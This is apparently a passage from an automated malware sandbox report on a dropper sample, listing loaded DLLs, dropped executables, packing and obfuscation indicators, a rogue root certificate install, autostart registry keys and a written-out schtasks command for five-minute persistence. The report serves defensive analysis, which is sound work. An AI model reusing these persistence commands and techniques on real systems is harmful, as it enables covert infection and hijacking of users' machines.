Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: icu.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: version.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: amsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: userenv.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: profapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wldp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasman.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: propsys.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: edputil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: netutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: slc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sppc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\System32\conhost.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: wfJfUGeGT3.exe

Static file information: File size 1411961 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: contorax[1].exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])
Source: contorax.exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])

Binary contains a suspicious time stamp

Source: contorax[1].exe.11.dr

Static PE information: 0xFA1A71C5 [Wed Dec 20 05:51:01 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: exbuild[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: 36f677264b.exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: meta[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: exbuild.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: contorax.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: crypteda[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: crypteda.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: BowExpert.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: BowExpert[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: GOLD[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e
Source: contorax[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: meta.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: GOLD.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e

PE file contains sections with non-standard names

Source: 3546345.exe.11.dr	Static PE information: section name: /4
Source: 3546345.exe.11.dr	Static PE information: section name: /14
Source: 3546345.exe.11.dr	Static PE information: section name: /29
Source: 3546345.exe.11.dr	Static PE information: section name: /41
Source: 3546345.exe.11.dr	Static PE information: section name: /55
Source: 3546345.exe.11.dr	Static PE information: section name: /67
Source: 3546345.exe.11.dr	Static PE information: section name: /80
Source: 3546345.exe.11.dr	Static PE information: section name: /91
Source: 3546345.exe.11.dr	Static PE information: section name: /102
Source: meta[1].exe.11.dr	Static PE information: section name: .managed
Source: meta[1].exe.11.dr	Static PE information: section name: hydrated
Source: meta.exe.11.dr	Static PE information: section name: .managed
Source: meta.exe.11.dr	Static PE information: section name: hydrated
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb
Source: random[1].exe.11.dr	Static PE information: section name: plcvpmpk
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb
Source: 36f677264b.exe.11.dr	Static PE information: section name: plcvpmpk
Source: 36f677264b.exe.11.dr	Static PE information: section name: .taggant
Source: channel2[1].exe.11.dr	Static PE information: section name: /4
Source: channel2[1].exe.11.dr	Static PE information: section name: /14
Source: channel2[1].exe.11.dr	Static PE information: section name: /29
Source: channel2[1].exe.11.dr	Static PE information: section name: /41
Source: channel2[1].exe.11.dr	Static PE information: section name: /55
Source: channel2[1].exe.11.dr	Static PE information: section name: /67
Source: channel2[1].exe.11.dr	Static PE information: section name: /80
Source: channel2[1].exe.11.dr	Static PE information: section name: /91
Source: channel2[1].exe.11.dr	Static PE information: section name: /102
Source: channel2.exe.11.dr	Static PE information: section name: /4
Source: channel2.exe.11.dr	Static PE information: section name: /14
Source: channel2.exe.11.dr	Static PE information: section name: /29
Source: channel2.exe.11.dr	Static PE information: section name: /41
Source: channel2.exe.11.dr	Static PE information: section name: /55
Source: channel2.exe.11.dr	Static PE information: section name: /67
Source: channel2.exe.11.dr	Static PE information: section name: /80
Source: channel2.exe.11.dr	Static PE information: section name: /91
Source: channel2.exe.11.dr	Static PE information: section name: /102
Source: Channel1[1].exe.11.dr	Static PE information: section name: /4
Source: Channel1[1].exe.11.dr	Static PE information: section name: /14
Source: Channel1[1].exe.11.dr	Static PE information: section name: /29
Source: Channel1[1].exe.11.dr	Static PE information: section name: /41
Source: Channel1[1].exe.11.dr	Static PE information: section name: /55
Source: Channel1[1].exe.11.dr	Static PE information: section name: /67
Source: Channel1[1].exe.11.dr	Static PE information: section name: /80
Source: Channel1[1].exe.11.dr	Static PE information: section name: /91
Source: Channel1[1].exe.11.dr	Static PE information: section name: /102

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D8B75 push ecx; ret	19_2_005D8B88
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CCBF1 push eax; retf	19_2_005CCBF8
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB2808 push ds; retf	24_2_00CB280B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB280D push ds; retf	24_2_00CB281B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB02B4 push ecx; ret	24_2_00CB02C7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007502B4 push ecx; ret	27_2_007502C7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0042136C push ecx; ret	31_2_0042137F
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A147F0 pushad ; iretd	31_2_02A147FD
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A12448 pushad ; retn 0009h	31_2_02A12455
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B115D3 push ecx; ret	31_2_02B115E6

Source: GOLD[1].exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: GOLD.exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: crypteda[1].exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: 36f677264b.exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: build2[1].exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218
Source: build2.exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File created: C:\Users\user\Windows.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	File created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Drops PE files to the user root directory

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File created: C:\Windows\Tasks\Hkbsse.job

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

